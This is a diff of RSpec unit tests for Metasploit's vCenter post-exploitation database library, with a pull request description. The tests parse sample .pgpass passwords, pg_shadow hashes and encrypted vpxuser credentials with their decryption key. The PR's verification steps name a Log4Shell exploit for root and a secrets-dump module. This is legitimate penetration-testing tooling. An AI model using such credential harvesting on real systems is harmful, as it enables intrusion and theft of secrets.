-    it 'from failing to find command' do
-      allow(subject).to receive(:command_exists?).and_return(false)
-      expect(subject.get_vpx_customization_spec('test', 'test', 'test')).to be_nil
+  describe '#query_pg_shadow_values' do
+    context 'when the command does not exist' do
+      it 'returns nil' do
+        allow(subject).to receive(:command_exists?).and_return(false)
+        expect(subject.get_vpx_customization_spec('test', 'test', 'test')).to be_nil
+      end
     end
-    it 'from failing to get a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
-      expect(subject.get_vpx_customization_spec('test', 'test', 'test')).to eq({})
+    context 'when the command doesnt return expected content' do
+      it 'returns empty hash' do
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('this is not valid')
+        expect(subject.get_vpx_customization_spec('test', 'test', 'test')).to eq({})
+      end
     end
-    it 'with a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('<xml></xml>')
-      # we need to convert the XML:Doc back to a string so it can be tested correctly
-      expect(subject.get_vpx_customization_spec('test', 'test', 'test').map { |k, v| [k.to_s, v.to_s] }.to_h).to eq({ '<xml></xml>' => "<?xml version=\"1.0\"?>\n<xml/>\n" })
+    context 'when the command returns a valid entry' do
+      it 'returns a valid processed XML doc' do
+        allow(subject).to receive(:command_exists?).and_return(true)
+        allow(subject).to receive(:cmd_exec).and_return('<xml></xml>')
+        # we need to convert the XML:Doc back to a string so it can be tested correctly
+        expect(subject.get_vpx_customization_spec('test', 'test', 'test').map { |k, v| [k.to_s, v.to_s] }.to_h).to eq({ '<xml></xml>' => "<?xml version=\"1.0\"?>\n<xml/>\n" })
+      end
     end
   end
 end

--- a/spec/lib/msf/core/post/vcenter/database_spec.rb
+++ b/spec/lib/msf/core/post/vcenter/database_spec.rb
@@ -1,0 +1,209 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Post::Vcenter::Database do
+  subject do
+    mod = Msf::Module.new
+    mod.extend(Msf::Post::Vcenter::Database)
+    mod
+  end
+
+  context 'gets pgpass correctly' do
+    it 'from failing' do
+      allow(subject).to receive(:file_exist?).and_return(false)
+      expect(subject.process_pgpass_file).to be_nil
+    end
+    it 'from empty file' do
+      allow(subject).to receive(:file_exist?).and_return(true)
+      allow(subject).to receive(:read_file).and_return('')
+      expect(subject.process_pgpass_file).to be_nil
+    end
+    it 'from file contents' do
+      allow(subject).to receive(:file_exist?).and_return(true)
+      allow(subject).to receive(:read_file).and_return('localhost:5432:replication:replicator:BN^qgk&a)Ee2dK@|
+127.0.0.1:5432:replication:replicator:BN^qgk&a)Ee2dK@|
+/var/run/vpostgres:5432:replication:replicator:BN^qgk&a)Ee2dK@|
+localhost:5432:postgres:postgres:i23rYgoPBQwpn!5
+127.0.0.1:5432:postgres:postgres:i23rYgoPBQwpn!5')
+      expect(subject.process_pgpass_file).to eq([
+        {
+          'database' => 'replication',
+          'hostname' => 'localhost',
+          'password' => 'BN^qgk&a)Ee2dK@|',
+          'port' => '5432',
+          'username' => 'replicator'
+        },
+        {
+          'database' => 'replication',
+          'hostname' => '127.0.0.1',
+          'password' => 'BN^qgk&a)Ee2dK@|',
+          'port' => '5432',
+          'username' => 'replicator'
+        },
+        {
+          'database' => 'replication',
+          'hostname' => '/var/run/vpostgres',
+          'password' => 'BN^qgk&a)Ee2dK@|',
+          'port' => '5432',
+          'username' => 'replicator'
+        },
+        {
+          'database' => 'postgres',
+          'hostname' => 'localhost',
+          'password' => 'i23rYgoPBQwpn!5',
+          'port' => '5432',
+          'username' => 'postgres'
+        },
+        {
+          'database' => 'postgres',
+          'hostname' => '127.0.0.1',
+          'password' => 'i23rYgoPBQwpn!5',
+          'port' => '5432',
+          'username' => 'postgres'
+        }
+      ])
+    end
+  end
+
+  context 'gets pg_shadow values' do
+    it 'from failing to find command' do
+      allow(subject).to receive(:command_exists?).and_return(false)
+      expect(subject.query_pg_shadow_values('test', 'test', 'test')).to be_nil
+    end
+    it 'from failing to get a valid entry' do
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
+      expect(subject.query_pg_shadow_values('test', 'test', 'test')).to eq([])
+    end
+    it 'with a valid entry' do
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('postgres|md5fdb13b980a01e3d1ae99b5b55b6e4303
+replicator|md5c2a01981014a380b63c0c7c66ad77ba9
+archiver|
+vc|md53b5a9fc0dd6c99567e9ca27c459b43d9
+vumuser|md5fc719b1b56f02981027379fd15125feb
+cns|md5d92e4534c059354dee12a7cc9a79faff')
+      expect(subject.query_pg_shadow_values('test', 'test', 'test')).to eq([
+        { 'password_hash' => 'md5fdb13b980a01e3d1ae99b5b55b6e4303', 'user' => 'postgres' },
+        { 'password_hash' => 'md5c2a01981014a380b63c0c7c66ad77ba9', 'user' => 'replicator' },
+        { 'password_hash' => 'md53b5a9fc0dd6c99567e9ca27c459b43d9', 'user' => 'vc' },
+        { 'password_hash' => 'md5fc719b1b56f02981027379fd15125feb', 'user' => 'vumuser' },
+        { 'password_hash' => 'md5d92e4534c059354dee12a7cc9a79faff', 'user' => 'cns' }
+      ])
+    end
+  end
+
+  context 'gets pg_shadow values' do
+    it 'from failing to find command' do
+      allow(subject).to receive(:command_exists?).and_return(false)
+      expect(subject.query_vpx_creds('test', 'test', 'test')).to be_nil
+    end
+    it 'from failing to get a valid entry' do
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
+      expect(subject.query_vpx_creds('test', 'test', 'test')).to eq([])
+    end
+    it 'with a valid entry' do
+      # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
+      # and https://github.com/shmilylty/vhost_password_decrypt
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('vpxuser|*tktZGW50GH4BEOXyWCr9WTu2PSMGWSvcqEsuAMnwcNuFO/rQPRsOyygRRY/WaM3IOI/BrqcThiaiM3j4Jw+KtA==|192.168.20.20|192.168.20.10|192.168.20.10
+vpxuser|*ZdvmNiLEXzZL/uhdW6Zb4Px4RR72iD+xftdA0n9hJ8xpFNJW/axpyKMQ8BJWIFTzzoxQnAm2PaX486yExLX7qg==|192.168.20.20|192.168.20.15|test1.local')
+      expect(subject.query_vpx_creds('test', 'test', 'test')).to eq([
+        {
+          'dns_name' => '192.168.20.10',
+          'encrypted_password' =>
+            '*tktZGW50GH4BEOXyWCr9WTu2PSMGWSvcqEsuAMnwcNuFO/rQPRsOyygRRY/WaM3IOI/BrqcThiaiM3j4Jw+KtA==',
+          'ip_address' => '192.168.20.10',
+          'local_ip' => '192.168.20.20',
+          'user' => 'vpxuser'
+        },
+        {
+          'dns_name' => 'test1.local',
+          'encrypted_password' =>
+          '*ZdvmNiLEXzZL/uhdW6Zb4Px4RR72iD+xftdA0n9hJ8xpFNJW/axpyKMQ8BJWIFTzzoxQnAm2PaX486yExLX7qg==',
+          'ip_address' => '192.168.20.15',
+          'local_ip' => '192.168.20.20',
+          'user' => 'vpxuser'
+        }
+      ])
+    end
+    it 'with a valid entry and symkey' do
+      # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
+      # and https://github.com/shmilylty/vhost_password_decrypt
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('vpxuser|*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==|192.168.20.20|192.168.20.15|test1.local')
+      expect(subject.query_vpx_creds('test', 'test', 'test', 'f1d0d054e43ac880809c354cec681b3433e36fc4ea6b1480de05b7b86c3506cd')).to eq([
+        {
+          'dns_name' => 'test1.local',
+          'encrypted_password' =>
+          '*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==',
+          'ip_address' => '192.168.20.15',
+          'local_ip' => '192.168.20.20',
+          'user' => 'vpxuser',
+          'decrypted_password' => '-KOU.80J\I0n\Pcqya3F0af=z5Ix-5.u'
+        }
+      ])
+    end
+    it 'with a valid entry and bad symkey' do
+      # combination of https://github.com/rapid7/metasploit-framework/pull/16465#issuecomment-1117587575
+      # and https://github.com/shmilylty/vhost_password_decrypt
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('vpxuser|*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==|192.168.20.20|192.168.20.15|test1.local')
+      expect(subject.query_vpx_creds('test', 'test', 'test', 'bad0d054e43ac880809c354cec681b3433e36fc4ea6b1480de05b7b86c3506cd')).to eq([
+        {
+          'dns_name' => 'test1.local',
+          'encrypted_password' =>
+          '*SN2otuvNvGRSC29lxhU4XQbgNOMyVawGF4UHA38w2zq59tX0WzkgkQTNBJSJpHvBvkYwyiR8xNAv1oquEOOLvQ==',
+          'ip_address' => '192.168.20.15',
+          'local_ip' => '192.168.20.20',
+          'user' => 'vpxuser'
+        }
+      ])
+    end
+  end
+
+  # XXX need to add a real user test
+  context 'gets vpx users' do
+    it 'from failing to find command' do
+      allow(subject).to receive(:command_exists?).and_return(false)
+      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to be_nil
+    end
+    it 'from failing to get a valid entry' do
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
+      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to eq([])
+    end
+    it 'with a valid entry' do
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('localhost|127.0.0.1|root|*')
+      # we need to convert the XML:Doc back to a string so it can be tested correctly
+      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to eq([
+        {
+          'fqdn' => 'localhost',
+          'ip' => '127.0.0.1',
+          'user' => 'root',
+          'password' => ''
+        }
+      ])
+    end
+    # XXX need to add a valid test where we actually decrypt something
+  end
+
+  context 'gets vpx customizations xml' do
+    it 'from failing to find command' do
+      allow(subject).to receive(:command_exists?).and_return(false)
+      expect(subject.get_vpx_customization_spec('test', 'test', 'test')).to be_nil
+    end
+    it 'from failing to get a valid entry' do
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
+      expect(subject.get_vpx_customization_spec('test', 'test', 'test')).to eq({})
+    end
+    it 'with a valid entry' do
+      allow(subject).to receive(:command_exists?).and_return(true)
+      allow(subject).to receive(:cmd_exec).and_return('<xml></xml>')
+      # we need to convert the XML:Doc back to a string so it can be tested correctly
+      expect(subject.get_vpx_customization_spec('test', 'test', 'test').map { |k, v| [k.to_s, v.to_s] }.to_h).to eq({ '<xml></xml>' => "<?xml version=\"1.0\"?>\n<xml/>\n" })
+    end
+  end
+end

--- a/spec/lib/msf/core/post/vcenter/database_spec.rb
+++ b/spec/lib/msf/core/post/vcenter/database_spec.rb
@@ -62,6 +62,23 @@ localhost:5432:postgres:postgres:i23rYgoPBQwpn!5
         }
       ])
     end
+    it 'from file contents with * as port' do
+      allow(subject).to receive(:file_exist?).and_return(true)
+      allow(subject).to receive(:read_file).and_return('localhost:*:replication:replicator:BN^qgk&a)Ee2dK@|
+127.0.0.1:5432:replication:replicator:BN^qgk&a)Ee2dK@|
+/var/run/vpostgres:5432:replication:replicator:BN^qgk&a)Ee2dK@|
+localhost:5432:postgres:postgres:i23rYgoPBQwpn!5
+127.0.0.1:5432:postgres:postgres:i23rYgoPBQwpn!5')
+      expect(subject.process_pgpass_file).to eq([
+        {
+          'database' => 'replication',
+          'hostname' => 'localhost',
+          'password' => 'BN^qgk&a)Ee2dK@|',
+          'port' => '5432',
+          'username' => 'replicator'
+        }
+      ])
+    end
   end
 
   context 'gets pg_shadow values' do

--- a/spec/lib/msf/core/post/vcenter/vcenter_spec.rb
+++ b/spec/lib/msf/core/post/vcenter/vcenter_spec.rb
@@ -340,10 +340,12 @@ RSpec.describe Msf::Post::Vcenter::Vcenter do
     it 'from failing to get a valid entry' do
       allow(subject).to receive(:file_exist?).and_return(true)
       allow(subject).to receive(:read_file).and_return('this is not valid')
+      allow(subject).to receive(:is_root?).and_return(true)
       expect(subject.process_vcdb_properties_file).to eq({})
     end
     it 'and processes them correctly' do
       allow(subject).to receive(:file_exist?).and_return(true)
+      allow(subject).to receive(:is_root?).and_return(true)
       allow(subject).to receive(:read_file).and_return("driver = org.postgresql.Driver\ndbtype = PostgreSQL\nurl = jdbc:postgresql://localhost:5432/VCDB\nusername = vc\npassword = MB&|<)haN6Q>{K3O\npassword.encrypted = false")
       expect(subject.process_vcdb_properties_file).to eq({
         'driver' => 'org.postgresql.Driver',

--- a/spec/lib/msf/core/post/vcenter/vcenter_spec.rb
+++ b/spec/lib/msf/core/post/vcenter/vcenter_spec.rb
@@ -332,50 +332,6 @@ RSpec.describe Msf::Post::Vcenter::Vcenter do
     end
   end
 
-  context 'gets vpx coustomization xml' do
-    it 'from failing to find command' do
-      allow(subject).to receive(:command_exists?).and_return(false)
-      expect(subject.get_vpx_customization_spec('test', 'test', 'test')).to be_nil
-    end
-    it 'from failing to get a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
-      expect(subject.get_vpx_customization_spec('test', 'test', 'test')).to eq({})
-    end
-    it 'with a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('<xml></xml>')
-      # we need to convert the XML:Doc back to a string so it can be tested correctly
-      expect(subject.get_vpx_customization_spec('test', 'test', 'test').map { |k, v| [k.to_s, v.to_s] }.to_h).to eq({ '<xml></xml>' => "<?xml version=\"1.0\"?>\n<xml/>\n" })
-    end
-  end
-  # XXX need to add a real user test
-  context 'gets vpx users' do
-    it 'from failing to find command' do
-      allow(subject).to receive(:command_exists?).and_return(false)
-      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to be_nil
-    end
-    it 'from failing to get a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('this is not valid')
-      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to eq([])
-    end
-    it 'with a valid entry' do
-      allow(subject).to receive(:command_exists?).and_return(true)
-      allow(subject).to receive(:cmd_exec).and_return('localhost|127.0.0.1|root|*')
-      # we need to convert the XML:Doc back to a string so it can be tested correctly
-      expect(subject.get_vpx_users('test', 'test', 'test', 'test')).to eq([
-        {
-          'fqdn' => 'localhost',
-          'ip' => '127.0.0.1',
-          'user' => 'root',
-          'password' => ''
-        }
-      ])
-    end
-    # XXX need to add a valid test where we actually decrypt something
-  end
-
   context 'gets vcdb properties' do
     it 'from failing to find command' do
       allow(subject).to receive(:file_exist?).and_return(false)


### PR DESCRIPTION
fixes #16490

This PR incorporates @ErikWynter 's [vcenter postgres/database module](https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb)  to improve upon the data gathered on a vcenter server which was originally implemented in #16871.  There was a slight bit of moving things around now that a vcenter database lib exists, and a few other optimizations (refs, removing unused code, adding authors, etc).


## Verification


- [ ] Start `msfconsole`
- [ ] use an exploit to get root on a box, such as `exploit/multi/http/vmware_vcenter_log4shell`
- [ ] `use vcenter_secrets_dump`
- [ ] `set session 1`
- [ ] run
- [ ] **Verify** no errors are encountered
- [ ] **Documentation** looks good
